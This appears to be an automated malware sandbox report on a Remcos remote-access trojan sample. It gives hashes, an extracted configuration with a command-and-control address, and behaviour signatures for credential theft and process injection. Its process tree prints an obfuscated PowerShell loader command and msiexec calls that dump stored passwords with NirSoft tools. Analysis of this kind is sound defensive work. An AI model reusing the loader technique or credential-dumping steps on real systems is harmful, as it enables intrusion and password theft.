Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
09-12-2024 08:41
General
-
Target
MRP00108 & SDA00687.exe
-
Size
710KB
-
MD5
9fc11ee03f60a10e4a2f26edbf8fcdaf
-
SHA1
7ed74a2e69bd49aadc4716a420dcacea97e220d7
-
SHA256
30d74b831f98532075daed442b93067c7ce8846d7cbd557f43a13922840b698a
-
SHA512
ee2d8b55b9b2b2d3e5cf867688236299a5585be3a7516dc8027e9965b2ac7354f1bf84fcf9f998af7ed185f8b36bbfd1b1a0e6d5a41b65a6d4ed06f722382adf
-
SSDEEP
12288:X6qSGX12mgYtQvCOgMAwhsuiB/IhyrWQIUbMZHBeGoOO+XKCR6i0EYuCn0a:HJX1YBvCHMquiBJaQ/eBeGoOOKKCR655
Malware Config
Extracted
remcos
RemoteHost
157.230.51.65:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-R66R8R
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\MRP00108 & SDA00687.exe"C:\Users\Admin\AppData\Local\Temp\MRP00108 & SDA00687.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Uforenelige=gc -Raw 'C:\Users\Admin\AppData\Local\Country216\Filterintegration.Eks';$indefencibly=$Uforenelige.SubString(2896,3);.$indefencibly($Uforenelige)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmvpzphbxqwxrakwkuuvzrphtvf"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\moaiaasdlyobbgyacehwkecqucotyeo"4⤵
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\moaiaasdlyobbgyacehwkecqucotyeo"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wifsbsdwzggodmuelptqniwhdrgcrpnase"4⤵
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wifsbsdwzggodmuelptqniwhdrgcrpnase"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD55f6a1e4f7815ad8cd3ac34d6a24a70d0
SHA10976097824a8e9d4075a6b7da35c43b89f5d4292
SHA25623ae9a18d3f74d6d0329ae6286409470862e20e57086ed03c1c228def639edd9
SHA512d8c79b1e0b0dd4108dd129d35c994dce5984370c83ef20d2efa3fddb6b7fa3ea46c38bd317bca1536a0a4d8e70d36a4db2ecf0c3b51d14492f592d92d11e9be3
-
Filesize
52KB
MD5b2675a19c8907bdb1caac87a463036ab
SHA1ce3eb4761dd92a88834851e404952edebac92ff3
SHA256e55feb751d85c738f96c802c9df5af30ef0722a0af003bdc65826f31c2d0b9cd
SHA5125d0707af18e5e0790c48c33ab62869cdbba3662de10850368b8a0ad1511896a29ce6f7b1d1daaa45876ce83873d8cef1df592092c07615e7a72dd5d3620a95b4
-
Filesize
338KB
MD5eee1c80e83b995bdcb5f27b31e64cdf6
SHA1d5e6eaf73c07d24efe44f443a0fc83fe92c51055
SHA2560515372b843282de9ff41a9c6a88a641dfd658d98674676fd83e79a871f8d681
SHA512b0d4beed14e69b58c74617d612daf248b7b6e2535cded360156f38b42ae545700d852ccb60c9186903cd97b5b7ba3985261d95eb29cf700db91856a87dab9a75
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5c3c5f2de99b7486f697634681e21bab0
SHA100f90d495c0b2b63fde6532e033fdd2ade25633d
SHA25676296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582
SHA5127c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
6.5MB
-
Filesize
62.4MB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
600KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
100KB
-
Filesize
18.3MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB